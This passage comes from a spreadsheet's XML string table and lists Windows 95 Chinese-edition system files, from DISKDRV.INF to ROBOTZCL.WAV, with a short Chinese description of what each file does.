    <t>DISKDRV.INF</t>
  </si>
  <si>
    <t>安装信息</t>
  </si>
  <si>
    <t>DISPLAY.TXT</t>
  </si>
  <si>
    <t>显示卡README文件</t>
  </si>
  <si>
    <t>DMCOLOR.DLL</t>
  </si>
  <si>
    <t>通用打印驱动程序彩打支持库</t>
  </si>
  <si>
    <t>DOSKEY.COM</t>
  </si>
  <si>
    <t>DOS命令</t>
  </si>
  <si>
    <t>DOSX.EXE</t>
  </si>
  <si>
    <t>MSDOS配置程序</t>
  </si>
  <si>
    <t>DRAGDrop.AVI</t>
  </si>
  <si>
    <t>影片剪辑(AVI)(如何使用拖拽)</t>
  </si>
  <si>
    <t>DRIVER.SYS</t>
  </si>
  <si>
    <t>DOS驱动程序</t>
  </si>
  <si>
    <t>DRVSPACE.EXE</t>
  </si>
  <si>
    <t>磁盘压缩工具</t>
  </si>
  <si>
    <t>DRVSPACE.HLP</t>
  </si>
  <si>
    <t>磁盘空间管理帮助文件</t>
  </si>
  <si>
    <t>DOS文字编辑程序</t>
  </si>
  <si>
    <t>EDLIN.EXE</t>
  </si>
  <si>
    <t>DOS行编辑器</t>
  </si>
  <si>
    <t>EE16.VXD</t>
  </si>
  <si>
    <t>虚拟设备驱动程序</t>
  </si>
  <si>
    <t>EISA.VXD</t>
  </si>
  <si>
    <t>即插即用EISA总线计数器</t>
  </si>
  <si>
    <t>EK550C.ICM</t>
  </si>
  <si>
    <t>打印机简介</t>
  </si>
  <si>
    <t>EMM386.EXE</t>
  </si>
  <si>
    <t>扩展内存管理程序</t>
  </si>
  <si>
    <t>ENABLE.INF</t>
  </si>
  <si>
    <t>初始化信息</t>
  </si>
  <si>
    <t>ENGCT.EXE</t>
  </si>
  <si>
    <t>MSN支持文件</t>
  </si>
  <si>
    <t>ESCP24SC.DRV</t>
  </si>
  <si>
    <t>设备驱动程序</t>
  </si>
  <si>
    <t>EUDCEDIT.CNF</t>
  </si>
  <si>
    <t>帮助索引文件(造字程序)</t>
  </si>
  <si>
    <t>EUDCEDIT.HLP</t>
  </si>
  <si>
    <t>帮助文件(造字程序)</t>
  </si>
  <si>
    <t>EUDCEDIT.INF</t>
  </si>
  <si>
    <t>安装信息文件(造字程序)</t>
  </si>
  <si>
    <t>EVX16.DOS</t>
  </si>
  <si>
    <t>EWRK3.DOS</t>
  </si>
  <si>
    <t>EWRK3.SYS</t>
  </si>
  <si>
    <t>EXCEL.XLS</t>
  </si>
  <si>
    <t>Excel5.0文件模板</t>
  </si>
  <si>
    <t>EXCEL4.XLS</t>
  </si>
  <si>
    <t>Excel4.0文件模板</t>
  </si>
  <si>
    <t>EXCHANGE.TXT</t>
  </si>
  <si>
    <t>Inbox和Exchange的自述文件</t>
  </si>
  <si>
    <t>EXCHNG.CNT</t>
  </si>
  <si>
    <t>Mail/Exchange帮助文件内容</t>
  </si>
  <si>
    <t>EXCHNG.HLP</t>
  </si>
  <si>
    <t>Mail/Exchange组件</t>
  </si>
  <si>
    <t>EXCHNG32.EXE</t>
  </si>
  <si>
    <t>对用户的交换机作初始设置</t>
  </si>
  <si>
    <t>EXPLORER.AVI</t>
  </si>
  <si>
    <t>影片剪辑(AVI)(如何使用资源管理器)</t>
  </si>
  <si>
    <t>EXPLORER.EXE</t>
  </si>
  <si>
    <t>“资源管理器”应用程序</t>
  </si>
  <si>
    <t>EXPO.HLP</t>
  </si>
  <si>
    <t>帮助文件(产品信息)</t>
  </si>
  <si>
    <t>EXPOSTRT.EXE</t>
  </si>
  <si>
    <t>产品信息应用程序</t>
  </si>
  <si>
    <t>EXTRACT.EXE</t>
  </si>
  <si>
    <t>解压缩工具</t>
  </si>
  <si>
    <t>EXTRA.TXT</t>
  </si>
  <si>
    <t>自述文件(联机访问附加文件)</t>
  </si>
  <si>
    <t>F</t>
  </si>
  <si>
    <t>FAQ.TXT</t>
  </si>
  <si>
    <t>疑难解答自述文件</t>
  </si>
  <si>
    <t>FAXCODEC.DLL</t>
  </si>
  <si>
    <t>传真编码/译码器</t>
  </si>
  <si>
    <t>FAXCOVER.EXE</t>
  </si>
  <si>
    <t>封面编辑器</t>
  </si>
  <si>
    <t>FC.EXE</t>
  </si>
  <si>
    <t>DOS命令,比较两个文件</t>
  </si>
  <si>
    <t>FD16-700.MPD</t>
  </si>
  <si>
    <t>FD8XX.MPD</t>
  </si>
  <si>
    <t>DOS命令,在硬盘上建立、删除及显示当前分区</t>
  </si>
  <si>
    <t>FILESEC.VXD</t>
  </si>
  <si>
    <t>文件存取控制管理器</t>
  </si>
  <si>
    <t>FILEXFER.CNT</t>
  </si>
  <si>
    <t>文件传输帮助文件内容</t>
  </si>
  <si>
    <t>FILEXFER.EXE</t>
  </si>
  <si>
    <t>Microsoft文件传输</t>
  </si>
  <si>
    <t>FIND.AVI</t>
  </si>
  <si>
    <t>影片剪辑(如何使用查找)</t>
  </si>
  <si>
    <t>寻找指定字符串命令</t>
  </si>
  <si>
    <t>FINDMVI.DLL</t>
  </si>
  <si>
    <t>媒体视觉支持</t>
  </si>
  <si>
    <t>FINSTALL.DLL</t>
  </si>
  <si>
    <t>字库安装程序</t>
  </si>
  <si>
    <t>FINSTALL.HLP</t>
  </si>
  <si>
    <t>字库安装帮助文件</t>
  </si>
  <si>
    <t>FLSIMTD.VXD</t>
  </si>
  <si>
    <t>PCMCIA支持</t>
  </si>
  <si>
    <t>FONT16.EXE</t>
  </si>
  <si>
    <t>DOS6.22中文版16点阵字体驱动程序</t>
  </si>
  <si>
    <t>FONTS.INF</t>
  </si>
  <si>
    <t>字体选择初始化信息</t>
  </si>
  <si>
    <t>FONTVIEW.EXE</t>
  </si>
  <si>
    <t>字体浏览程序</t>
  </si>
  <si>
    <t>DOS磁盘格式化工具</t>
  </si>
  <si>
    <t>FOUTLINE.EXE</t>
  </si>
  <si>
    <t>轮廓字体驱动程序</t>
  </si>
  <si>
    <t>FRAMEBUF.DRV</t>
  </si>
  <si>
    <t>SVGA显示器驱动程序</t>
  </si>
  <si>
    <t>FTE.DLL</t>
  </si>
  <si>
    <t>声音浏览文件传输工程文件</t>
  </si>
  <si>
    <t>FTP.EXE</t>
  </si>
  <si>
    <t>文件传输协议TCP工具</t>
  </si>
  <si>
    <t>FURELI~1.RMI</t>
  </si>
  <si>
    <t>G</t>
  </si>
  <si>
    <t>GBK.TXT</t>
  </si>
  <si>
    <t>中文Windows95GBK代码集字符定义表</t>
  </si>
  <si>
    <t>GDI.EXE</t>
  </si>
  <si>
    <t>简版WIN3.1图形界面</t>
  </si>
  <si>
    <t>GDI32.DLL</t>
  </si>
  <si>
    <t>32位GDI图形界面</t>
  </si>
  <si>
    <t>GENERAL.IDF</t>
  </si>
  <si>
    <t>一般MIDI指示器</t>
  </si>
  <si>
    <t>GRPCONV.EXE</t>
  </si>
  <si>
    <t>Windows程序组转换器</t>
  </si>
  <si>
    <t>GUIDE.EXE</t>
  </si>
  <si>
    <t>应用程序(MSN)</t>
  </si>
  <si>
    <t>H</t>
  </si>
  <si>
    <t>HARDWARE.TXT</t>
  </si>
  <si>
    <t>硬件自述文件</t>
  </si>
  <si>
    <t>HOSTS.SAM</t>
  </si>
  <si>
    <t>TCP配置</t>
  </si>
  <si>
    <t>HPCLRLSK.ICM</t>
  </si>
  <si>
    <t>打印简介</t>
  </si>
  <si>
    <t>HPDESK.ICM</t>
  </si>
  <si>
    <t>打印机简介表</t>
  </si>
  <si>
    <t>HPDSKJET.DRV</t>
  </si>
  <si>
    <t>打印机驱动程序</t>
  </si>
  <si>
    <t>HPEISA.VXD</t>
  </si>
  <si>
    <t>网络适配器驱动程序</t>
  </si>
  <si>
    <t>HPJAHLP.CNT</t>
  </si>
  <si>
    <t>JetAdmin程序帮助文件</t>
  </si>
  <si>
    <t>HPJD.DLL</t>
  </si>
  <si>
    <t>HPJetAdmin支持程序</t>
  </si>
  <si>
    <t>HPLAN.DOS</t>
  </si>
  <si>
    <t>HPLJ300.DRV</t>
  </si>
  <si>
    <t>HPLJ300DPI打印机驱动程序</t>
  </si>
  <si>
    <t>HPLJ300.EXE</t>
  </si>
  <si>
    <t>MSDOS命令(HP打印机驱动)</t>
  </si>
  <si>
    <t>HPLJ-31.SPD</t>
  </si>
  <si>
    <t>HPLJ600.DRV</t>
  </si>
  <si>
    <t>HPLJ600DPI打印机驱动程序</t>
  </si>
  <si>
    <t>HPLJP-V4.INF</t>
  </si>
  <si>
    <t>打印机安装信息</t>
  </si>
  <si>
    <t>HPNETPRN.INF</t>
  </si>
  <si>
    <t>HPPJXL31.SPD</t>
  </si>
  <si>
    <t>HPPLOT.DRV</t>
  </si>
  <si>
    <t>HPPLOT.HLP</t>
  </si>
  <si>
    <t>打印机驱动程序帮助文件</t>
  </si>
  <si>
    <t>HPPRARBK.DLL</t>
  </si>
  <si>
    <t>HPPRARRK.HLP</t>
  </si>
  <si>
    <t>HPJetAdmin支持程序帮助文件</t>
  </si>
  <si>
    <t>HPVCM.HPM</t>
  </si>
  <si>
    <t>HSFLOP.PDR</t>
  </si>
  <si>
    <t>HSFLOP虚拟设备</t>
  </si>
  <si>
    <t>HTICONS.DLL</t>
  </si>
  <si>
    <t>终端设备动态链接库</t>
  </si>
  <si>
    <t>HYPERTRM.CNT</t>
  </si>
  <si>
    <t>终端设备帮助文件</t>
  </si>
  <si>
    <t>HYPERTRM.EXE</t>
  </si>
  <si>
    <t>终端设备应用程序</t>
  </si>
  <si>
    <t>HYPERTRM.HLP</t>
  </si>
  <si>
    <t>“超级终端”帮助</t>
  </si>
  <si>
    <t>HZKBD.EXE</t>
  </si>
  <si>
    <t>常用输入方法程序</t>
  </si>
  <si>
    <t>HZVIO95.EXE</t>
  </si>
  <si>
    <t>显示驱动程序</t>
  </si>
  <si>
    <t>I82593.DOS</t>
  </si>
  <si>
    <t>IB401917.SPD</t>
  </si>
  <si>
    <t>IBM20470.SPD</t>
  </si>
  <si>
    <t>IBM20K.DOS</t>
  </si>
  <si>
    <t>ICM32.DLL</t>
  </si>
  <si>
    <t>图象颜色匹配程序</t>
  </si>
  <si>
    <t>ICMOI.DLL</t>
  </si>
  <si>
    <t>用户界面颜色匹配程序</t>
  </si>
  <si>
    <t>ICONLIB.DLL</t>
  </si>
  <si>
    <t>图符库</t>
  </si>
  <si>
    <t>IEXPLORE.CNT</t>
  </si>
  <si>
    <t>帮助索引文件(IE)</t>
  </si>
  <si>
    <t>IEXPLORE.EXE</t>
  </si>
  <si>
    <t>InternetExplore</t>
  </si>
  <si>
    <t>IEXPLORE.HLP</t>
  </si>
  <si>
    <t>帮助文件(IE)</t>
  </si>
  <si>
    <t>IFSHLP.SYS</t>
  </si>
  <si>
    <t>文件系统安装帮助文件</t>
  </si>
  <si>
    <t>IFSMGR.VXD</t>
  </si>
  <si>
    <t>文件系统安装管理程序</t>
  </si>
  <si>
    <t>IMAGEOIT.EXE</t>
  </si>
  <si>
    <t>图象编辑器光标程序</t>
  </si>
  <si>
    <t>IMCLIENT.DLL</t>
  </si>
  <si>
    <t>IME.CNT</t>
  </si>
  <si>
    <t>帮助索引文件(中文输入法)</t>
  </si>
  <si>
    <t>IME.HLP</t>
  </si>
  <si>
    <t>IME.INF</t>
  </si>
  <si>
    <t>安装信息文件(中文输入法)</t>
  </si>
  <si>
    <t>IMEGEN.CNF</t>
  </si>
  <si>
    <t>帮助索引文件(输入法生成器)</t>
  </si>
  <si>
    <t>输入法生成器</t>
  </si>
  <si>
    <t>IMEGEN.HLP</t>
  </si>
  <si>
    <t>帮助文件(输入法生成器)</t>
  </si>
  <si>
    <t>IMEINFO.INI</t>
  </si>
  <si>
    <t>输入法初始化文件</t>
  </si>
  <si>
    <t>IMM32.DLL</t>
  </si>
  <si>
    <t>WIN32IMM应用程序界面</t>
  </si>
  <si>
    <t>INBOX.EXC</t>
  </si>
  <si>
    <t>邮件组件</t>
  </si>
  <si>
    <t>INDICDLL.DLL</t>
  </si>
  <si>
    <t>多语言组件</t>
  </si>
  <si>
    <t>INET.TXT</t>
  </si>
  <si>
    <t>IE自述文件</t>
  </si>
  <si>
    <t>INET16.DLL</t>
  </si>
  <si>
    <t>动态链接库(支持IE2.0)</t>
  </si>
  <si>
    <t>INETAB32.DLL</t>
  </si>
  <si>
    <t>INETCFG.DLL</t>
  </si>
  <si>
    <t>INETCPL.CPL</t>
  </si>
  <si>
    <t>控制面板文件(配置IE2.0)</t>
  </si>
  <si>
    <t>INETMAIL.INF</t>
  </si>
  <si>
    <t>INETWIZ.EXE</t>
  </si>
  <si>
    <t>Internet安装向导</t>
  </si>
  <si>
    <t>INformS.WPF</t>
  </si>
  <si>
    <t>样板文件</t>
  </si>
  <si>
    <t>INSTBE.BAT</t>
  </si>
  <si>
    <t>INSTDICT.EXE</t>
  </si>
  <si>
    <t>MSDOS命令(输入法安装程序)</t>
  </si>
  <si>
    <t>INTB.VXD</t>
  </si>
  <si>
    <t>13号中断虚拟设备</t>
  </si>
  <si>
    <t>INTL.CPL</t>
  </si>
  <si>
    <t>控制面板</t>
  </si>
  <si>
    <t>INT-MAIL.CNT</t>
  </si>
  <si>
    <t>IOS.INI</t>
  </si>
  <si>
    <t>设置需要安全保护的程序</t>
  </si>
  <si>
    <t>IOSCLASS.DLL</t>
  </si>
  <si>
    <t>CDROM安装程序</t>
  </si>
  <si>
    <t>IRMATR.DOS</t>
  </si>
  <si>
    <t>ISAPNP.VXD</t>
  </si>
  <si>
    <t>ISA总线即插即用程序</t>
  </si>
  <si>
    <t>J</t>
  </si>
  <si>
    <t>JOY.CPL</t>
  </si>
  <si>
    <t>游戏杆控制面板</t>
  </si>
  <si>
    <t>JOYSTICK.INF</t>
  </si>
  <si>
    <t>多媒体安装信息</t>
  </si>
  <si>
    <t>JP350.DRV</t>
  </si>
  <si>
    <t>JUNGLE~1.WAV</t>
  </si>
  <si>
    <t>声音文件</t>
  </si>
  <si>
    <t>K</t>
  </si>
  <si>
    <t>KBDBE.KBD</t>
  </si>
  <si>
    <t>比利时键盘格式</t>
  </si>
  <si>
    <t>KBDBR.KBD</t>
  </si>
  <si>
    <t>巴西键盘格式</t>
  </si>
  <si>
    <t>KBDCA.KBD</t>
  </si>
  <si>
    <t>法国、加拿大键盘格式</t>
  </si>
  <si>
    <t>KBDOS.KBD</t>
  </si>
  <si>
    <t>美国键盘格式</t>
  </si>
  <si>
    <t>KDCOLOR1.SPD</t>
  </si>
  <si>
    <t>KERNEL32.DLL</t>
  </si>
  <si>
    <t>32位内核</t>
  </si>
  <si>
    <t>KEYB.COM</t>
  </si>
  <si>
    <t>将控制键盘程序装入内存</t>
  </si>
  <si>
    <t>KODAKCE.ICM</t>
  </si>
  <si>
    <t>柯达ICC配置文件</t>
  </si>
  <si>
    <t>KRNL386.EXE</t>
  </si>
  <si>
    <t>Core应用程序</t>
  </si>
  <si>
    <t>L</t>
  </si>
  <si>
    <t>LABEL.EXE</t>
  </si>
  <si>
    <t>DOS命令,设置磁盘名称</t>
  </si>
  <si>
    <t>LFNBK.EXE</t>
  </si>
  <si>
    <t>长文件名备份文件</t>
  </si>
  <si>
    <t>LFNBK.TXT</t>
  </si>
  <si>
    <t>LFNBK的自述文件</t>
  </si>
  <si>
    <t>LICENSE.HLP</t>
  </si>
  <si>
    <t>LMSCRIPT.EXE</t>
  </si>
  <si>
    <t>LAN管理器文稿处理程序</t>
  </si>
  <si>
    <t>LOGIN.EXE</t>
  </si>
  <si>
    <t>Win95登录NetWare文件</t>
  </si>
  <si>
    <t>LQ1600K.EXE</t>
  </si>
  <si>
    <t>LQ1600K打印驱动程序</t>
  </si>
  <si>
    <t>M</t>
  </si>
  <si>
    <t>MAILMSG.DLL</t>
  </si>
  <si>
    <t>微软网络组件</t>
  </si>
  <si>
    <t>MAILOPT.INF</t>
  </si>
  <si>
    <t>MAIL/MAPI设置文件</t>
  </si>
  <si>
    <t>MAPI.DLL</t>
  </si>
  <si>
    <t>MCIAVI.DRV</t>
  </si>
  <si>
    <t>多媒体驱动程序</t>
  </si>
  <si>
    <t>MCICDA.DRV</t>
  </si>
  <si>
    <t>MCICD声音驱动程序</t>
  </si>
  <si>
    <t>MCIOLE.DLL</t>
  </si>
  <si>
    <t>MCIOLE句柄</t>
  </si>
  <si>
    <t>MCIPIONR.DRV</t>
  </si>
  <si>
    <t>MCI光盘驱动程序</t>
  </si>
  <si>
    <t>MCISEQ.DRV</t>
  </si>
  <si>
    <t>MCI定序器驱动程序</t>
  </si>
  <si>
    <t>MCIVISCA.DRV</t>
  </si>
  <si>
    <t>MCIVCR驱动程序</t>
  </si>
  <si>
    <t>MCIWAVE.DRV</t>
  </si>
  <si>
    <t>MDMNOKIA.INF</t>
  </si>
  <si>
    <t>安装信息文件(modem)</t>
  </si>
  <si>
    <t>MDMNOVA.INF</t>
  </si>
  <si>
    <t>MDMVV.INF</t>
  </si>
  <si>
    <t>MEMMAKER.EXE</t>
  </si>
  <si>
    <t>内存管理程序</t>
  </si>
  <si>
    <t>MEMMAKER.INF</t>
  </si>
  <si>
    <t>内存管理程序设置信息</t>
  </si>
  <si>
    <t>MFCUIA32.DLL</t>
  </si>
  <si>
    <t>OLEI公共对话动态链接库</t>
  </si>
  <si>
    <t>MIDI.INF</t>
  </si>
  <si>
    <t>即插即用MIDI设备信息</t>
  </si>
  <si>
    <t>MINET32.DLL</t>
  </si>
  <si>
    <t>MKECR5XX.MPD</t>
  </si>
  <si>
    <t>ML3XEC16.EXE</t>
  </si>
  <si>
    <t>应用程序(MAPI)</t>
  </si>
  <si>
    <t>MLSHEXT.DLL</t>
  </si>
  <si>
    <t>微软核扩展库</t>
  </si>
  <si>
    <t>MMCI.DLL</t>
  </si>
  <si>
    <t>媒体类安装程序</t>
  </si>
  <si>
    <t>MMDEVLDR.VXD</t>
  </si>
  <si>
    <t>即插即用设备装载程序</t>
  </si>
  <si>
    <t>MMDRV.HLP</t>
  </si>
  <si>
    <t>多媒体帮助文件</t>
  </si>
  <si>
    <t>MMSOUND.DRV</t>
  </si>
  <si>
    <t>MMSYSTEM.DLL</t>
  </si>
  <si>
    <t>多媒体系统内核</t>
  </si>
  <si>
    <t>MMTASK.TSK</t>
  </si>
  <si>
    <t>多媒体背景任务交换器</t>
  </si>
  <si>
    <t>MODE.COM</t>
  </si>
  <si>
    <t>MODERN.FON</t>
  </si>
  <si>
    <t>字体文件(modem)</t>
  </si>
  <si>
    <t>MOUSE.DRV</t>
  </si>
  <si>
    <t>鼠标驱动程序</t>
  </si>
  <si>
    <t>MOVEWIN.AVI</t>
  </si>
  <si>
    <t>影片剪辑(如何移动窗口)</t>
  </si>
  <si>
    <t>MPLAYER.EXE</t>
  </si>
  <si>
    <t>媒体播放程序</t>
  </si>
  <si>
    <t>MPR.DLL</t>
  </si>
  <si>
    <t>WIN32网络接口动态链接库</t>
  </si>
  <si>
    <t>MSAB32.DLL</t>
  </si>
  <si>
    <t>微软网络地址簿</t>
  </si>
  <si>
    <t>MSBASE.INF</t>
  </si>
  <si>
    <t>设置信息</t>
  </si>
  <si>
    <t>MSCDROM.INF</t>
  </si>
  <si>
    <t>类安装设置信息</t>
  </si>
  <si>
    <t>MSD.EXE</t>
  </si>
  <si>
    <t>微软诊断工具</t>
  </si>
  <si>
    <t>MSD.INI</t>
  </si>
  <si>
    <t>微软诊断初始化</t>
  </si>
  <si>
    <t>MSDET.INF</t>
  </si>
  <si>
    <t>系统检测设置信息</t>
  </si>
  <si>
    <t>MSDISP.INF</t>
  </si>
  <si>
    <t>显示设置信息</t>
  </si>
  <si>
    <t>MSDLG.EXE</t>
  </si>
  <si>
    <t>数据链接控制协议</t>
  </si>
  <si>
    <t>MSDOS.INF</t>
  </si>
  <si>
    <t>MSDOSDRV.TXT</t>
  </si>
  <si>
    <t>设备驱动程序自述文件</t>
  </si>
  <si>
    <t>MSFT.VRL</t>
  </si>
  <si>
    <t>MSGSRV32.EXE</t>
  </si>
  <si>
    <t>Windows32位虚拟设备信息系统</t>
  </si>
  <si>
    <t>MSHDC.INF</t>
  </si>
  <si>
    <t>硬盘控制设置信息</t>
  </si>
  <si>
    <t>MSJSTICK.DRV</t>
  </si>
  <si>
    <t>即插即用游戏杆驱动程序</t>
  </si>
  <si>
    <t>MSMAIL.INF</t>
  </si>
  <si>
    <t>Mail/MAPI初始化</t>
  </si>
  <si>
    <t>MSMOUSE.INF</t>
  </si>
  <si>
    <t>鼠标设置信息</t>
  </si>
  <si>
    <t>MSN.TXT</t>
  </si>
  <si>
    <t>微软网络自述文件</t>
  </si>
  <si>
    <t>MSNET32.DLL</t>
  </si>
  <si>
    <t>微软32位网络API库</t>
  </si>
  <si>
    <t>MSNEXCH.EXE</t>
  </si>
  <si>
    <t>微软网络设置程序</t>
  </si>
  <si>
    <t>MSNPSS.HLP</t>
  </si>
  <si>
    <t>微软网络帮助文件</t>
  </si>
  <si>
    <t>MSNVER.TXT</t>
  </si>
  <si>
    <t>微软网络帮助信息</t>
  </si>
  <si>
    <t>MSPAINT.EXE</t>
  </si>
  <si>
    <t>画图工具</t>
  </si>
  <si>
    <t>MSPCIC.DLL</t>
  </si>
  <si>
    <t>PCMCIA类安装与控制工具</t>
  </si>
  <si>
    <t>MSPORTS.INF</t>
  </si>
  <si>
    <t>公共设置信息</t>
  </si>
  <si>
    <t>MSPP32.DLL</t>
  </si>
  <si>
    <t>微软网络打印支持程序</t>
  </si>
  <si>
    <t>MSPWL32.DLL</t>
  </si>
  <si>
    <t>口令清单管理库</t>
  </si>
  <si>
    <t>MSSBLST.DRV</t>
  </si>
  <si>
    <t>声霸卡驱动程序</t>
  </si>
  <si>
    <t>MSSBLSI.VXD</t>
  </si>
  <si>
    <t>MSSHRVI.DLL</t>
  </si>
  <si>
    <t>共享内核扩展程序</t>
  </si>
  <si>
    <t>MSSNDSYS.DRV</t>
  </si>
  <si>
    <t>Windows声音系统驱动程序</t>
  </si>
  <si>
    <t>MSSP.VXP</t>
  </si>
  <si>
    <t>MSTCP.DLL</t>
  </si>
  <si>
    <t>TCP用户界面</t>
  </si>
  <si>
    <t>MSVIEWUT.DLL</t>
  </si>
  <si>
    <t>显示设备服务数据链接库</t>
  </si>
  <si>
    <t>MTMMINIP.MPD</t>
  </si>
  <si>
    <t>MULLANG.INF</t>
  </si>
  <si>
    <t>多种语言字体支持设置信息</t>
  </si>
  <si>
    <t>MVIWAVE.DRV</t>
  </si>
  <si>
    <t>声音驱动程序</t>
  </si>
  <si>
    <t>N</t>
  </si>
  <si>
    <t>NBTSTAT.EXE</t>
  </si>
  <si>
    <t>TCP工具</t>
  </si>
  <si>
    <t>NDDEAPI.DLL</t>
  </si>
  <si>
    <t>NDDENB.DLL</t>
  </si>
  <si>
    <t>NDISHLP.SYS</t>
  </si>
  <si>
    <t>实模式NDIS支持驱动程序</t>
  </si>
  <si>
    <t>NET.EXE</t>
  </si>
  <si>
    <t>实模式网络客户软件</t>
  </si>
  <si>
    <t>NET.INF</t>
  </si>
  <si>
    <t>网络检测信息</t>
  </si>
  <si>
    <t>NET.MSG</t>
  </si>
  <si>
    <t>网络客户信息</t>
  </si>
  <si>
    <t>NET3COM.INF</t>
  </si>
  <si>
    <t>网络设置信息</t>
  </si>
  <si>
    <t>NETAMD.INF</t>
  </si>
  <si>
    <t>NETAPI.DLL</t>
  </si>
  <si>
    <t>网络应用程序接口动态链接库</t>
  </si>
  <si>
    <t>NETAPI32.DLL</t>
  </si>
  <si>
    <t>32位网络API动态链接库</t>
  </si>
  <si>
    <t>NETAVXT.INF</t>
  </si>
  <si>
    <t>MS内部传输文件</t>
  </si>
  <si>
    <t>NETBEUI.VXD</t>
  </si>
  <si>
    <t>32位NetBEUI协议</t>
  </si>
  <si>
    <t>NETBIOS.DLL</t>
  </si>
  <si>
    <t>NetBIOSAPI库</t>
  </si>
  <si>
    <t>NETDCA.INF</t>
  </si>
  <si>
    <t>NETDDE.EXE</t>
  </si>
  <si>
    <t>Windows网络动态数据交换</t>
  </si>
  <si>
    <t>NETDET.INI</t>
  </si>
  <si>
    <t>NetWare检测文件</t>
  </si>
  <si>
    <t>NETDI.DLL</t>
  </si>
  <si>
    <t>网络设备安装</t>
  </si>
  <si>
    <t>NETH.MSG</t>
  </si>
  <si>
    <t>网络客户帮助信息</t>
  </si>
  <si>
    <t>NETOS.DLL</t>
  </si>
  <si>
    <t>NOS检测DLL</t>
  </si>
  <si>
    <t>NETWATCH.EXE</t>
  </si>
  <si>
    <t>网络观测程序</t>
  </si>
  <si>
    <t>NETWORK.TXT</t>
  </si>
  <si>
    <t>网络信息自述文件</t>
  </si>
  <si>
    <t>NOTEPAD.EXE</t>
  </si>
  <si>
    <t>记事本应用程序</t>
  </si>
  <si>
    <t>NODRIVER.INF</t>
  </si>
  <si>
    <t>即插即用设备信息</t>
  </si>
  <si>
    <t>NOTEPAD文件</t>
  </si>
  <si>
    <t>NSCL.VXD</t>
  </si>
  <si>
    <t>NSCL虚拟设备</t>
  </si>
  <si>
    <t>NW16.DLL</t>
  </si>
  <si>
    <t>NetWare客户</t>
  </si>
  <si>
    <t>NWAB32.DLL</t>
  </si>
  <si>
    <t>地址簿支持动态链接库</t>
  </si>
  <si>
    <t>NWLSCON.EXE</t>
  </si>
  <si>
    <t>登录文稿控制台程序</t>
  </si>
  <si>
    <t>NWLSPROC.EXE</t>
  </si>
  <si>
    <t>NetWare登录处理器</t>
  </si>
  <si>
    <t>NWNET32.DLL</t>
  </si>
  <si>
    <t>NWNP32.DLL</t>
  </si>
  <si>
    <t>NetWare组件</t>
  </si>
  <si>
    <t>NWREDIR.VXD</t>
  </si>
  <si>
    <t>NetWare重定向</t>
  </si>
  <si>
    <t>NWSERVER.VXD</t>
  </si>
  <si>
    <t>NCP服务</t>
  </si>
  <si>
    <t>NWSP.VXD</t>
  </si>
  <si>
    <t>NCP服务安全提供</t>
  </si>
  <si>
    <t>O</t>
  </si>
  <si>
    <t>OEMREVA.INF</t>
  </si>
  <si>
    <t>OLE2.DLL</t>
  </si>
  <si>
    <t>OLE2.0动态链接库</t>
  </si>
  <si>
    <t>OLE2.INF</t>
  </si>
  <si>
    <t>OLE设置信息</t>
  </si>
  <si>
    <t>OLE32.DLL</t>
  </si>
  <si>
    <t>32位OLE2.0组件</t>
  </si>
  <si>
    <t>OLEAUT32.DLL</t>
  </si>
  <si>
    <t>OLE2-32自动化</t>
  </si>
  <si>
    <t>OLECL1.DLL</t>
  </si>
  <si>
    <t>对象链接与嵌入客户库</t>
  </si>
  <si>
    <t>OLEDLG.DLL</t>
  </si>
  <si>
    <t>OLESVR.DLL</t>
  </si>
  <si>
    <t>对象链接与嵌入服务端库</t>
  </si>
  <si>
    <t>OLETHK32.DLL</t>
  </si>
  <si>
    <t>OLE形实替换程序库</t>
  </si>
  <si>
    <t>P</t>
  </si>
  <si>
    <t>PACKAGER.EXE</t>
  </si>
  <si>
    <t>对象包装程序</t>
  </si>
  <si>
    <t>PARALINK.VXD</t>
  </si>
  <si>
    <t>远程网络存取并行口驱动程序</t>
  </si>
  <si>
    <t>PBRVSH.EXE</t>
  </si>
  <si>
    <t>“画图”应用程序</t>
  </si>
  <si>
    <t>PDOS95.BAT</t>
  </si>
  <si>
    <t>进入中文DOS状态</t>
  </si>
  <si>
    <t>PERF.VXD</t>
  </si>
  <si>
    <t>系统性能监视器</t>
  </si>
  <si>
    <t>PIFMGR.DLL</t>
  </si>
  <si>
    <t>程序信息文件管理服务程序</t>
  </si>
  <si>
    <t>PING.EXE</t>
  </si>
  <si>
    <t>TCPPing工具</t>
  </si>
  <si>
    <t>PMSPL.DLL</t>
  </si>
  <si>
    <t>LAN管理应用程序接口</t>
  </si>
  <si>
    <t>POWER.DRV</t>
  </si>
  <si>
    <t>高级电源管理驱动程序</t>
  </si>
  <si>
    <t>PPPMAC.VXD</t>
  </si>
  <si>
    <t>Windows虚拟PPP驱动程序</t>
  </si>
  <si>
    <t>PRINT.EXE</t>
  </si>
  <si>
    <t>DOS打印文件</t>
  </si>
  <si>
    <t>PRINTERS.TXT</t>
  </si>
  <si>
    <t>打印信息自述文件</t>
  </si>
  <si>
    <t>PROGMAN.EXE</t>
  </si>
  <si>
    <t>程序管理器</t>
  </si>
  <si>
    <t>PRTVPD.INF</t>
  </si>
  <si>
    <t>打印机升级设置信息</t>
  </si>
  <si>
    <t>Q</t>
  </si>
  <si>
    <t>QUIKVIEW.EXE</t>
  </si>
  <si>
    <t>快速查看</t>
  </si>
  <si>
    <t>QUIT.EXE</t>
  </si>
  <si>
    <t>退出中文DOS状态</t>
  </si>
  <si>
    <t>R</t>
  </si>
  <si>
    <t>README.TXT</t>
  </si>
  <si>
    <t>Windows95自述文件</t>
  </si>
  <si>
    <t>REGEDIT.EXE</t>
  </si>
  <si>
    <t>注册编辑器</t>
  </si>
  <si>
    <t>REGSERV.EXE</t>
  </si>
  <si>
    <t>远程注册</t>
  </si>
  <si>
    <t>REGWIE.EXE</t>
  </si>
  <si>
    <t>注册工具</t>
  </si>
  <si>
    <t>REGSERV.INF</t>
  </si>
  <si>
    <t>RESTORE.EXE</t>
  </si>
  <si>
    <t>RNAAPP.EXE</t>
  </si>
  <si>
    <t>拨号网络应用程序</t>
  </si>
  <si>
    <t>RNASERV.DLL</t>
  </si>
  <si>
    <t>远程网络存取服务</t>
  </si>
  <si>
    <t>RNASETUP.DLL</t>
  </si>
  <si>
    <t>远程网络存取设置动态链接库</t>
  </si>
  <si>
    <t>RNATHUNK.DLL</t>
  </si>
  <si>
    <t>远程网络存取转换支持动态链接库</t>
  </si>
  <si>
    <t>RNAUI.DLL</t>
  </si>
  <si>
    <t>远程网络存取用户接口DLLRNDSRV32.DLL复制服务程序</t>
  </si>
  <si>
    <t>ROBOTZCL.WAV</t>
  </si>
  <si>
